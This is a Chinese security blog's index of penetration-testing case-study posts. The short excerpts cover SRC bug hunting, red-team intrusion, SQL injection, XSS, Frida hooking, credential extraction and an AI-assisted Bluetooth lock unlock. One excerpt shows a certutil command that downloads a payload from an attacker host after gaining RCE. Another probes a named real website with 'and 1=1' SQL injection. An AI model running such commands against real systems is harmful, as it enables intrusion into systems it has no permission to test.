No.0前言挖洞就是要多思考,要是没有权限我们需要如何突破限制进行测试,我是No.2案例一首先登录XXXX平台然后找到以下接口。GET /user/credit?company=111111 HTTP...
10月17日11 views评论sec
实战案例
Src实战案例分享
10月17日11 views评论sec
实战案例
10月17日11 views评论sec
实战案例
极强AI入门学习实战案例:我用AI刻了把电子门锁-蓝牙BLE门锁解锁分析!
本文转自LINUXDO一位大神的技术文章,蓝牙门锁解锁过程使用AI进行分析提问并引导AI生成相应的代码,最终完美实现目的,非常值得所有想要使用AI来提升能力的小伙伴们学习。解决过程第一步:抓包对手机A...
10月02日68 views评论ble
实战案例
实战|某次极为顺畅的实战案例
真实案例,厚码见谅,有些步骤可能有些忘记,截图并不是很全面。一、金蝶云星空RCEshell之后尝试上线(出网)certutil -urlcache -split -f http://xx.xx.xx....
09月13日11 views评论mimikatz
实战案例
攻防 | 红队外网打点实战案例分享
本文将分享一系列红队外网打点实战案例,素材内容来源于之前参加的HVV比赛和红队检测项目,通过深入剖析攻击技术去探索红队渗透测试的最佳实践,不足之处烦请各位师傅指点交流! 红队外网打点实战案例分享 从最...
08月15日116 views评论burp
sql注入
实战案例分析:远程桌面密码获取(附内网各个密码获取方式)
案例背景:前日(7月27日),某市局xz给我一电话,说在现场扣押的xyr计算机中有远程桌面的连接记录(有保存登录凭证),点击连接,能够连上一台windows server 2022的云主...
07月29日93 views评论实战案例
远程桌面
app攻防-Frida&Hook 系列1
🌟 ❤️作者:yueji0j1anke首发于公号:剑客古月的安全屋字数:2032阅读时间: 30min声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或...
06月25日15 views评论frida
实战案例
企业SRC实战案例-时间校验漏洞
免责声明本公众号“猎洞时刻”旨在分享网络安全领域的相关知识,仅限于学习和研究之用。本公众号并不鼓励或支持任何非法活动。本公众号中提供的所有内容都是基于作者的经验和知识,并仅代表作者个人的观点和意见。这...
06月19日19 views评论实战案例
非法活动
从红队视角剖析实战案例
1. 前言 当前,各行业的网络安全防御体系建设正日益完善,特别是中大型企业,已经采购大量网络安全服务与产品。但随之而来的问题在于攻防实战演练下,企业整体防御能力到底如何?究竟能否抵抗各式各样的网络攻击...
06月17日127 views评论信息收集
网络安全
记一次实战案例
1、目标:inurl:news.php?id= URL:https://www.lghk.com/news.php?id=5 网站标题:趋时珠宝首饰有限公司手工基础判断:And用法and 1=1: ...
05月14日8 views评论实战案例
注入漏洞
信息泄露漏-实战案例
第一个案例收集资产时得到一个知识库管理平台,本着学习下大公司的企业文化和企业精神就深入了解一下。通过目录爆破扫到了管理员登录界面,密码爆破了一下,没有弱口令。但是看到页面上有个管理员手册,下载下来好好...
05月07日24 views评论信息泄露
实战案例
实战案例-如何从小程序到教务系统
0x01 edu实战案例如何从小程序到教务系统?如果挖edu没有账号,那么就可以尝试去挖小程序,因为大部分小程序可以微信登陆,不需要账号密码登陆,那么小程序就可以作为一个入口去测试本次案例就是一个小程...
04月28日21 views评论小程序
身份证
【安全前沿】XSS漏洞深度探索:高级利用策略与实战案例
点击蓝字关注我们在当今复杂的网络安全环境中,跨站脚本(XSS)漏洞作为常见的Web安全隐患,为红队提供了多维度的渗透途径。本文旨在深入剖析XSS漏洞的高级利用技巧,结合实际案例与代码示例,展示其在权限...
04月24日168 views评论document
xss
6